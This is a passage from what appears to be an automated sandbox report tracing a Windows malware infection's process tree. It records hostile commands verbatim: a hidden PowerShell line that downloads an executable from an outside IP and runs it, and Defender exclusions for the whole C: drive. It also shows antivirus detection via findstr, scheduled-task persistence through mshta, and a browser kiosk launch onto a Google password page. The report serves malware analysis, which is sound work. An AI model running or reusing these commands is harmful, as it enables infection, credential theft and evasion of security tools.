                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2528,i,8364431327338553577,7338955864024341559,262144 --variations-seed-version --mojo-platform-channel-handle=2696 /prefetch:8
                                                                            5⤵
                                                                              PID:5568
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3552,i,8364431327338553577,7338955864024341559,262144 --variations-seed-version --mojo-platform-channel-handle=3604 /prefetch:1
                                                                              5⤵
                                                                              • Uses browser remote debugging
                                                                              PID:6412
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3568,i,8364431327338553577,7338955864024341559,262144 --variations-seed-version --mojo-platform-channel-handle=3616 /prefetch:1
                                                                              5⤵
                                                                              • Uses browser remote debugging
                                                                              PID:6428
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5312,i,8364431327338553577,7338955864024341559,262144 --variations-seed-version --mojo-platform-channel-handle=5060 /prefetch:8
                                                                              5⤵
                                                                                PID:6496
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4680,i,8364431327338553577,7338955864024341559,262144 --variations-seed-version --mojo-platform-channel-handle=4112 /prefetch:8
                                                                                5⤵
                                                                                  PID:6656
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5592,i,8364431327338553577,7338955864024341559,262144 --variations-seed-version --mojo-platform-channel-handle=5568 /prefetch:8
                                                                                  5⤵
                                                                                    PID:2752
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6028,i,8364431327338553577,7338955864024341559,262144 --variations-seed-version --mojo-platform-channel-handle=6136 /prefetch:8
                                                                                    5⤵
                                                                                      PID:1224
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6028,i,8364431327338553577,7338955864024341559,262144 --variations-seed-version --mojo-platform-channel-handle=6136 /prefetch:8
                                                                                      5⤵
                                                                                        PID:3344
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10346910101\144409b916.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10346910101\144409b916.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    • Suspicious use of SendNotifyMessage
                                                                                    PID:672
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      taskkill /F /IM firefox.exe /T
                                                                                      4⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Kills process with taskkill
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:2224
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      taskkill /F /IM chrome.exe /T
                                                                                      4⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Kills process with taskkill
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:3496
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      taskkill /F /IM msedge.exe /T
                                                                                      4⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Kills process with taskkill
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:2936
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      taskkill /F /IM opera.exe /T
                                                                                      4⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Kills process with taskkill
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:3932
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      taskkill /F /IM brave.exe /T
                                                                                      4⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Kills process with taskkill
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:1088
                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                      4⤵
                                                                                        PID:5200
                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                          5⤵
                                                                                          • Drops desktop.ini file(s)
                                                                                          • Checks processor information in registry
                                                                                          • Modifies registry class
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          • Suspicious use of SendNotifyMessage
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:2492
                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1980 -prefsLen 27099 -prefMapHandle 1984 -prefMapSize 270279 -ipcHandle 2072 -initialChannelId {941f7b27-2492-4ed6-9892-1d0780b23bc6} -parentPid 2492 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2492" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                                                            6⤵
                                                                                              PID:3620
                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2480 -prefsLen 27135 -prefMapHandle 2484 -prefMapSize 270279 -ipcHandle 2500 -initialChannelId {c80d708d-1007-47da-9c6c-cad35e4bdb32} -parentPid 2492 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2492" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                                                              6⤵
                                                                                                PID:4032
                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3808 -prefsLen 25164 -prefMapHandle 3812 -prefMapSize 270279 -jsInitHandle 3816 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3824 -initialChannelId {15a6891c-d90f-46f3-9505-44c8e8d0347e} -parentPid 2492 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2492" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                                                6⤵
                                                                                                • Checks processor information in registry
                                                                                                PID:2444
                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3976 -prefsLen 27276 -prefMapHandle 3980 -prefMapSize 270279 -ipcHandle 4064 -initialChannelId {b5c93871-60a7-49ff-afef-4cd562f61cce} -parentPid 2492 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2492" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                                                6⤵
                                                                                                  PID:5056
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3184 -prefsLen 34775 -prefMapHandle 3096 -prefMapSize 270279 -jsInitHandle 3160 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3244 -initialChannelId {928050c8-f6b6-4236-ace8-0dea2efacabc} -parentPid 2492 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2492" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                                                  6⤵
                                                                                                  • Checks processor information in registry
                                                                                                  PID:5968
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5140 -prefsLen 35012 -prefMapHandle 5152 -prefMapSize 270279 -ipcHandle 5156 -initialChannelId {b09c4e5a-1451-4987-906e-cded16b3e8ac} -parentPid 2492 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2492" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                                                  6⤵
                                                                                                  • Checks processor information in registry
                                                                                                  PID:6552
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5368 -prefsLen 32952 -prefMapHandle 5372 -prefMapSize 270279 -jsInitHandle 5376 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5380 -initialChannelId {3dfa50bf-eb99-4359-bfe4-fe01d22b8756} -parentPid 2492 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2492" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                                                  6⤵
                                                                                                  • Checks processor information in registry
                                                                                                  PID:6620
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5584 -prefsLen 32952 -prefMapHandle 5588 -prefMapSize 270279 -jsInitHandle 5592 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5500 -initialChannelId {d1cd5fc3-d3ec-4aa5-b561-0c29acf6ab3c} -parentPid 2492 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2492" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                                                  6⤵
                                                                                                  • Checks processor information in registry
                                                                                                  PID:6632
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5764 -prefsLen 32952 -prefMapHandle 5768 -prefMapSize 270279 -jsInitHandle 5772 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5780 -initialChannelId {14976fe2-9f1a-46e9-9958-0cf25ccb50ec} -parentPid 2492 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2492" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                                                  6⤵
                                                                                                  • Checks processor information in registry
                                                                                                  PID:6660
                                                                                          • C:\Users\Admin\AppData\Local\Temp\10346920101\03f1ade1d9.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\10346920101\03f1ade1d9.exe"
                                                                                            3⤵
                                                                                            • Modifies Windows Defender DisableAntiSpyware settings
                                                                                            • Modifies Windows Defender Real-time Protection settings
                                                                                            • Modifies Windows Defender TamperProtection settings
                                                                                            • Modifies Windows Defender notification settings
                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                            • Checks BIOS information in registry
                                                                                            • Executes dropped EXE
                                                                                            • Identifies Wine through registry keys
                                                                                            • Windows security modification
                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:5024
                                                                                          • C:\Users\Admin\AppData\Local\Temp\10346930101\9a02d1b43e.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\10346930101\9a02d1b43e.exe"
                                                                                            3⤵
                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                            • Checks BIOS information in registry
                                                                                            • Executes dropped EXE
                                                                                            • Identifies Wine through registry keys
                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:3008
                                                                                          • C:\Users\Admin\AppData\Local\Temp\10346940101\EPTwCQd.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\10346940101\EPTwCQd.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:1088
                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                              4⤵
                                                                                                PID:5376
                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                4⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:6184
                                                                                            • C:\Users\Admin\AppData\Local\Temp\10346950101\oalJJxv.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\10346950101\oalJJxv.exe"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:6372
                                                                                            • C:\Users\Admin\AppData\Local\Temp\10346960101\7b35p_003.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\10346960101\7b35p_003.exe"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                              PID:3948
                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                                4⤵
                                                                                                  PID:1088
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                                    5⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2468
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  "C:\Windows\system32\svchost.exe"
                                                                                                  4⤵
                                                                                                  • Downloads MZ/PE file
                                                                                                  • Adds Run key to start application
                                                                                                  PID:6504
                                                                                                  • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                                                                    "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5580
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell Remove-MpPreference -ExclusionPath C:\
                                                                                                      6⤵
                                                                                                        PID:6072
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                                                                      5⤵
                                                                                                      • Deletes itself
                                                                                                      • Executes dropped EXE
                                                                                                      PID:624
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\{bac0a91d-01e7-4887-bc14-e6d9122b57b2}\7ba9c79.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\{bac0a91d-01e7-4887-bc14-e6d9122b57b2}\7ba9c79.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
                                                                                                        6⤵
                                                                                                          PID:12028
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\{456a1a11-578b-45ae-abe2-9b21656f9c83}\ab5a9e98.exe
                                                                                                            C:/Users/Admin/AppData/Local/Temp/{456a1a11-578b-45ae-abe2-9b21656f9c83}/\ab5a9e98.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
                                                                                                            7⤵
                                                                                                              PID:12548
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10346970101\kZZeUXM.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10346970101\kZZeUXM.exe"
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:13168
                                                                                                      • C:\Windows\SysWOW64\CMD.exe
                                                                                                        "C:\Windows\system32\CMD.exe" /c copy Sake.aiff Sake.aiff.bat & Sake.aiff.bat
                                                                                                        4⤵
                                                                                                          PID:2820
                                                                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                                                                            tasklist
                                                                                                            5⤵
                                                                                                            • Enumerates processes with tasklist
                                                                                                            PID:8780
                                                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                                                            findstr /I "opssvc wrsa"
                                                                                                            5⤵
                                                                                                              PID:8792
                                                                                                            • C:\Windows\SysWOW64\tasklist.exe
                                                                                                              tasklist
                                                                                                              5⤵
                                                                                                              • Enumerates processes with tasklist
                                                                                                              PID:9204
                                                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                                                              findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                                                                              5⤵
                                                                                                                PID:9208
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                cmd /c md 550264
                                                                                                                5⤵
                                                                                                                  PID:5296
                                                                                                                • C:\Windows\SysWOW64\extrac32.exe
                                                                                                                  extrac32 /Y /E Flexible.aiff
                                                                                                                  5⤵
                                                                                                                    PID:9560
                                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                                    findstr /V "CONSEQUENCE" States
                                                                                                                    5⤵
                                                                                                                      PID:9872
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      cmd /c copy /b 550264\Isolation.com + Defense + Successful + Palmer + Contacting + Broadcast + Growth + Gods + Jones + Comfort + Dutch + Smith 550264\Isolation.com
                                                                                                                      5⤵
                                                                                                                        PID:9924
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        cmd /c copy /b ..\Tutorials.aiff + ..\Tells.aiff + ..\Assists.aiff + ..\Create.aiff + ..\Setting.aiff + ..\Somebody.aiff + ..\Riding.aiff + ..\Avon.aiff + ..\Functions.aiff + ..\Axis.aiff + ..\Singapore.aiff d
                                                                                                                        5⤵
                                                                                                                          PID:10004
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\550264\Isolation.com
                                                                                                                          Isolation.com d
                                                                                                                          5⤵
                                                                                                                            PID:10104
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\550264\Isolation.com
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\550264\Isolation.com
                                                                                                                              6⤵
                                                                                                                                PID:12992
                                                                                                                            • C:\Windows\SysWOW64\choice.exe
                                                                                                                              choice /d y /t 5
                                                                                                                              5⤵
                                                                                                                                PID:10208
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10346980101\TbV75ZR.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10346980101\TbV75ZR.exe"
                                                                                                                            3⤵
                                                                                                                              PID:1840
                                                                                                                              • C:\Windows\SysWOW64\CMD.exe
                                                                                                                                "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
                                                                                                                                4⤵
                                                                                                                                  PID:336
                                                                                                                                  • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                    tasklist
                                                                                                                                    5⤵
                                                                                                                                    • Enumerates processes with tasklist
                                                                                                                                    PID:10616
                                                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                    findstr /I "opssvc wrsa"
                                                                                                                                    5⤵
                                                                                                                                      PID:10628
                                                                                                                                    • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                      tasklist
                                                                                                                                      5⤵
                                                                                                                                      • Enumerates processes with tasklist
                                                                                                                                      PID:10720
                                                                                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                      findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                                                                                                      5⤵
                                                                                                                                        PID:10728
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd /c md 267978
                                                                                                                                        5⤵
                                                                                                                                          PID:10784
                                                                                                                                        • C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                          extrac32 /Y /E Spanish.vss
                                                                                                                                          5⤵
                                                                                                                                            PID:10808
                                                                                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                            findstr /V "East" Removed
                                                                                                                                            5⤵
                                                                                                                                              PID:11024
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
                                                                                                                                              5⤵
                                                                                                                                                PID:11064
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
                                                                                                                                                5⤵
                                                                                                                                                  PID:11156
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
                                                                                                                                                  Exam.com j
                                                                                                                                                  5⤵
                                                                                                                                                    PID:11212
                                                                                                                                                  • C:\Windows\SysWOW64\choice.exe
                                                                                                                                                    choice /d y /t 5
                                                                                                                                                    5⤵
                                                                                                                                                      PID:11296
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10346990101\kDveTWY.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10346990101\kDveTWY.exe"
                                                                                                                                                  3⤵
                                                                                                                                                    PID:7516
                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                      4⤵
                                                                                                                                                        PID:7444
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10347000101\FjbTOQC.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10347000101\FjbTOQC.exe"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:10248
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10347010101\7IIl2eE.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10347010101\7IIl2eE.exe"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:11384
                                                                                                                                                          • C:\Windows\SysWOW64\CMD.exe
                                                                                                                                                            "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                                                                                                                            4⤵
                                                                                                                                                              PID:11468
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10347020101\BIm18E9.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10347020101\BIm18E9.exe"
                                                                                                                                                            3⤵
                                                                                                                                                              PID:11668
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10347030101\WLbfHbp.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10347030101\WLbfHbp.exe"
                                                                                                                                                              3⤵
                                                                                                                                                                PID:11928
                                                                                                                                                                • C:\Windows\SysWOW64\CMD.exe
                                                                                                                                                                  "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:12040
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10347050101\ffd1aee91b.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10347050101\ffd1aee91b.exe"
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:12808
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10347050101\ffd1aee91b.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:2268
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10347060101\a9cf700c7b.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10347060101\a9cf700c7b.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:13136
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10347060101\a9cf700c7b.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:8596
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10347070101\ebac9c20c8.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10347070101\ebac9c20c8.exe"
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:6256
                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:7064
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10347080101\00a788ddca.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10347080101\00a788ddca.exe"
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:8480
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c schtasks /create /tn YPM8RmacCbr /tr "mshta C:\Users\Admin\AppData\Local\Temp\V3EzUB4OU.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:8452
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /create /tn YPM8RmacCbr /tr "mshta C:\Users\Admin\AppData\Local\Temp\V3EzUB4OU.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                      PID:8220
                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                    mshta C:\Users\Admin\AppData\Local\Temp\V3EzUB4OU.hta
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:8444
                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'EHZMYLUHIRZNZMGZTF2JORN7CR2FFOVM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                        PID:8332
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10347090121\am_no.cmd" "
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:7988
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:5584
                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:2072
                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
